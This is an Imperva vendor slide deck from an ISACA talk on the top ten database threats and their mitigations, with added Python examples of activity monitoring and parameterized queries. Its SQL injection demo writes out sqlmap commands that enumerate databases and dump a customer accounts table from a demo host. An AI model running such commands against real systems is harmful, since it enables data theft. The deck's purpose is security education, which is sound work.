© 2013 Imperva, Inc. All rights reserved.

Top 10 Database Threats

ISACA Charlotte Chapter

Presented by Eric Gerena

Agenda

Background

Top 10 Database Threats

Neutralizing the Threats

SQLi Attack Demonstration

Q&A

Background

What’s Changed?

Top 10 Database Threats

Are you at risk?

1. Excessive & Unused Privileges

2. Privilege Abuse

3. SQLi (SQL Injection)

4. Malware

5. Weak Audit Trail

6. Storage Media Exposure

7. Database Vulnerability Exploitation

8. Unmanaged Sensitive Data

9. Denial of Service (DoS)

10. Limited Security Expertise & Education

Neutralizing the Threats

Risk Mitigation

How to Neutralize the Threats

Discover, Classify & Assess

User Rights Management

Auditing, Monitoring & Protecting

Data Protection

Non-Technical Security

Discover, Classify & Assess

[Diagram: a discovery sweep that finds active and rogue databases, classifies the data each one holds (SSN, credit cards, PII) and derives a risk rating from vulnerability assessments]

Discover Active DBs

Discover Rogue DBs

Classify DBs

Vulnerability Assessments

User Rights Management

Reduce Unwarranted Data Access

Map Rights to Individuals

Identify Dormant Accounts

Enforce “Need-to-Know”

Comply

Auditing, Monitoring & Protecting

[Diagram: a database activity monitor inspects a statement such as UPDATE orders set client 'first ... arriving from network users, DBAs and sysadmins, flags it as unusual activity and either allows or blocks it]

Real Time Alerting & Blocking

Detect Unusual DB Activity

Monitor Local DB Activity

Impose Connection Controls
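The four controls on this slide, expressed as a small rule engine over captured database activity. This is an added illustration, not Imperva code: the roles, approved source hosts, the sensitive-table list, the row threshold and the sample events are all constructed assumptions for the demo.

```python
import re
from dataclasses import dataclass

# Constructed policy (an assumption for the demo, not Imperva configuration):
# approved source hosts per role, and the tables that hold sensitive data.
ALLOWED_SOURCES = {"app": {"10.0.0.11"}, "dba": {"10.0.0.50"}}
SENSITIVE_TABLES = {"legacy_customer_accounts"}
BULK_ROW_THRESHOLD = 100   # rows in one statement before a bulk-access alert
DDL_DCL = {"CREATE", "ALTER", "DROP", "TRUNCATE", "GRANT", "REVOKE"}

@dataclass
class AuditEvent:
    user: str        # database login
    role: str        # "app" (application service account) or "dba"
    source: str      # client address seen by the database agent or gateway
    statement: str   # SQL text as captured
    rows: int        # rows returned or affected

def classify(statement):
    """Return (verb, set of lower-cased table names) for a captured statement."""
    words = statement.split()
    verb = words[0].upper() if words else ""
    pat = r"\b(?:FROM|UPDATE|INTO|JOIN)\s+([A-Za-z_][\w.]*)"
    return verb, {t.lower() for t in re.findall(pat, statement, re.I)}

def decide(ev):
    """Return (action, reason) for one event; action is 'allow', 'alert' or 'block'."""
    verb, tables = classify(ev.statement)
    # Impose connection controls: a role connecting from an unapproved host is blocked.
    if ev.source not in ALLOWED_SOURCES.get(ev.role, set()):
        return "block", f"{ev.role} login {ev.user} from unapproved host {ev.source}"
    # An application account never needs DDL/DCL; treat it as an injected or abused session.
    if ev.role == "app" and verb in DDL_DCL:
        return "block", f"{verb} issued by application account {ev.user}"
    sensitive = bool(tables & SENSITIVE_TABLES)
    unfiltered = re.search(r"\bWHERE\b", ev.statement, re.I) is None
    # Unusual activity: whole-table access to sensitive data is blocked, large filtered reads alerted on.
    if sensitive and verb in {"SELECT", "UPDATE", "DELETE"} and unfiltered:
        return "block", f"unfiltered {verb} against sensitive table"
    if sensitive and ev.rows > BULK_ROW_THRESHOLD:
        return "alert", f"bulk access to sensitive data ({ev.rows} rows)"
    return "allow", "matches expected activity profile"

# Constructed sample events (not real audit data).
SAMPLE_EVENTS = [
    AuditEvent("webapp", "app", "10.0.0.11", "SELECT name FROM products WHERE prodid = 7", 1),
    AuditEvent("webapp", "app", "10.0.0.11", "SELECT * FROM Legacy_Customer_Accounts", 5000),
    AuditEvent("jsmith", "dba", "10.0.0.77", "UPDATE orders SET client = 'first' WHERE id = 7", 1),
    AuditEvent("webapp", "app", "10.0.0.11", "DROP TABLE orders", 0),
]
```

Running `decide` over `SAMPLE_EVENTS` yields allow, block, block, block; a real deployment would feed these decisions to the gateway or agent that enforces them.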

Data Protection

Tamper-Proof Audit Trail

Storage Encryption

Non-Technical Security

User Education & Awareness

Cultivate Experienced Security Professionals

Risk Reduction

[Chart: risk reduction by quarter, Q1-2013 through Q4-2013, with series for Awareness, Audit and Vulnerabilities]

SQLi Attack Demonstration

It still works!

Anatomy of the Attack

Identify the Vulnerability

Exploit the Vulnerability

Compromi$e the Victim

So, what tools will be used?

Identify the Vulnerability: Commercial Web App Vulnerability Scanner

Exploit the Vulnerability and Compromi$e the Victim: DB Exploit Tool "SQLMap"

SQLMap Attack Commands

Identify All Databases and Current Database

./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything --dbs

./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything --current-db

Identify Table(s) of Interest and Associated Columns

./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything -D superveda_db --tables

./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything -D superveda_db -T Legacy_Customer_Accounts --columns

Dump Records from Identified Table and Columns

./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything -D superveda_db -T Legacy_Customer_Accounts --columns --dump >> /root/Desktop/SQLi-Attack-Results.txt
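What makes a page like proddetails.jsp?ProdID=... exploitable by a tool such as the one above is request input pasted into the SQL text. The example below is added here and is not the deck's demo application: it uses a constructed in-memory SQLite catalogue and contrasts the concatenating lookup with a validated, parameterized one.

```python
import sqlite3

def make_demo_db():
    """Constructed in-memory stand-in for the demo's product catalogue (sample rows, not real data)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products (prodid INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO products VALUES (1, 'widget'), (2, 'gadget'), (3, 'gizmo');
    """)
    return con

def product_details_vulnerable(con, prod_id):
    """The pattern behind a vulnerable proddetails.jsp?ProdID=...: request input
    is concatenated into the SQL text, so it can rewrite the query's logic."""
    sql = "SELECT prodid, name FROM products WHERE prodid = " + prod_id
    return con.execute(sql).fetchall()

def product_details_safe(con, prod_id):
    """Hardened lookup: reject anything that is not an integer, then pass the value
    as a bound parameter so the driver never interprets it as SQL."""
    if not prod_id.isdigit():
        raise ValueError("ProdID must be a positive integer")
    sql = "SELECT prodid, name FROM products WHERE prodid = ?"
    return con.execute(sql, (int(prod_id),)).fetchall()

def compare(prod_id):
    """Run the same input through both paths; returns (vulnerable_rows, safe_result)."""
    con = make_demo_db()
    vulnerable = product_details_vulnerable(con, prod_id)
    try:
        safe = product_details_safe(con, prod_id)
    except ValueError as e:
        safe = str(e)
    return vulnerable, safe

if __name__ == "__main__":
    # A legitimate lookup behaves the same on both paths ...
    print(compare("2"))
    # ... while a condition appended to the ID makes the vulnerable path return
    # every row, whereas the hardened path rejects the input before it reaches SQL.
    print(compare("2 OR 1=1"))
```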

Off to the Black Market!

Imperva

Data Security Solutions

Imperva Highlights

About Imperva: founded 2002; CEO Shlomo Kramer, co-founder of Check Point; HQ in Redwood Shores, CA; 1,800+ customers and 25,000+ organizations; customers in 50+ countries.

The Problems We Solve: protecting the data that drives business; maintaining regulatory compliance.

Company Highlights: 480+ employees; $104M in revenue; $48M deferred revenue; cash & CE: $102M; publicly traded (IMPV).

[Chart: revenue 2010 through 2013, 33% YoY growth]

The Solution

Solving the business security problem requires a new protection layer positioned closely around the data and applications in the data center

[Diagram: external customers, staff, partners and hackers on one side; internal employees, malicious insiders and compromised insiders on the other; data center systems and admins in between, wrapped by a protection layer providing technical attack protection, logic attack protection, fraud prevention, usage audit, user rights management and access control]

IMPERVA’S MISSION IS TO PROVIDE A COMPLETE SOLUTION

Databases - Coverage

Coverage for Heterogeneous Databases

DB2, DB2 z/OS, DB2400, Informix, Netezza

Web Scanner Integration

Thank You

Imperva Data Security Solutions